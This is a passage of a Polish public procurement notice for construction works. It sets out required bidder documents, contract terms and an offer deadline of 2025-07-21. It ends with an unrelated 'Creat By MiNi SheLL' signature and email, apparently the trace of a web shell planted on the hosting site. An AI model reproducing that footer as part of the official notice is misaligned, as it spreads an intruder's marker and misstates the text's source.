których mowa w ppkt 1), wykonawca składa inne podmiotowe <br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego <br/>warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji ekonomicznej lub finansowej. <br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie <br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA. <br/>Pozostałe ustalenia dot. warunków udziału w postępowaniu zawarte są w rozdziale V SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W trakcie procedury badania i oceny ofert na podstawie art. 274 ust 1 ustawy pzp Wykonawca, którego <br/>oferta zostanie najwyżej oceniona (oceniona, jako najkorzystniejsza), zostanie wezwany przez <br/>Zamawiającego w wyznaczonym terminie nie krótszym niż 5 dni terminie do przedłożenia następujących <br/>oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów): <br/>2.1. W zakresie nie podlegania wykluczeniu z udziału w postępowaniu: <br/>1) Aktualizującego oświadczenia o braku podstaw wykluczenia z postępowania na podstawie art. 108 ust. 1 <br/>pkt. 5 ustawy pzp – wg Załącznika nr 8 SWZ. <br/>W przypadku złożenia oferty wspólnej dokumenty z podpunktu 1 składa każdy z wykonawców, którzy złożyli <br/>ofertę wspólną.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W trakcie procedury badania i oceny ofert na podstawie art. 274 ust 1 ustawy pzp Wykonawca, którego <br/>oferta zostanie najwyżej oceniona (oceniona, jako najkorzystniejsza), zostanie wezwany przez <br/>Zamawiającego w wyznaczonym terminie nie krótszym niż 5 dni terminie do przedłożenia następujących <br/>oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów): <br/>W zakresie spełnienia warunków udziału w postępowaniu: <br/>1) Wykazu wykonanych robót budowlanych oraz dokumentu potwierdzającego należytą realizację – na <br/>potwierdzenie spełnienia warunku udziału wskazanego w SWZ: <br/>Załącznik nr 6 SWZ (wykaz wykonanych robót budowlanych - doświadczenie). <br/>2) Wykazu osób które będą uczestniczyć w realizacji zamówienia – na potwierdzenie spełnienia warunku <br/>udziału wskazanego w SWZ: <br/>Załącznik nr 7 SWZ (wykaz osób, kwalifikacje). <br/>3. Ponadto Wykonawca zostanie wezwany do uzupełnienia dokumentacji o uprawnienia i aktualne <br/>zaświadczenie o przynależności do Izby Inżynierów osób wymienionych do kierowania robotami</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń w celu wstępnego potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia <br/>warunki udziału w postępowaniu (rozdział V ust. 1 niniejszej SWZ) – SKŁADANE DO OFERTY: <br/>1) aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca nie <br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu zgodne z załączonymi wzorami. <br/>Załącznik nr 3 i 3a SWZ <br/>Załącznik nr 4 SWZ <br/>2) zobowiązanie podmiotu trzeciego, o którym mowa w art. 118 ust 3 i ust. 4 ustawy pzp – jeżeli Wykonawca <br/>polega na zasobach lub sytuacji podmiotu trzeciego. <br/>Załącznik nr 5 i 5a SWZ <br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie braku <br/>podstaw wykluczenia (Załącznik nr 3 i 3a) składa każdy z Wykonawców wspólnie ubiegających się o <br/>zamówienie. W zakresie spełnienia warunków udziału w postępowaniu oświadczenie składa ten <br/>wykonawca, który spełnia warunek lub łącznie razem.<br/>4) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy <br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do <br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy <br/>dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia. <br/>5) Pełnomocnictwo lub inny dokument, z którego wynika umocowanie do składania oświadczeń w imieniu <br/>wykonawcy, podmiotu udostępniającego zasoby czy złożeniu oferty wspólnej. <br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego <br/>reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru <br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego <br/>rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli <br/>zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca <br/>wskazał dane umożliwiające dostęp do tych dokumentów (formularz oferty Załącznik nr 1 SWZ) <br/>Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z <br/>dokumentów, o których mowa powyżej, zamawiający może żądać od wykonawcy pełnomocnictwa lub <br/>innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. Powyższe stosuje się <br/>odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia publicznego oraz odpowiednio do osoby działającej w imieniu podmiotu udostępniającego <br/>zasoby na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem <br/>udostępniającym zasoby na takich zasadach. <br/>6) Wycenioną tabelę elementów rozliczeniowych, o treści zgodnej z załączonym wzorem – wg Załącznika nr 2 <br/>SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy <br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do <br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy <br/>dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający działając zgodnie z przepisami art. 455 ustawy Pzp, przewiduje w ogłoszeniu o zamówieniu lub dokumentach zamówienia możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia .<br/>2. Zmiany w umowie mogą dotyczyć:<br/>1) zmiany terminu wykonania zamówienia,<br/>2) zmiany na polecenie Zamawiającego, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-21 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com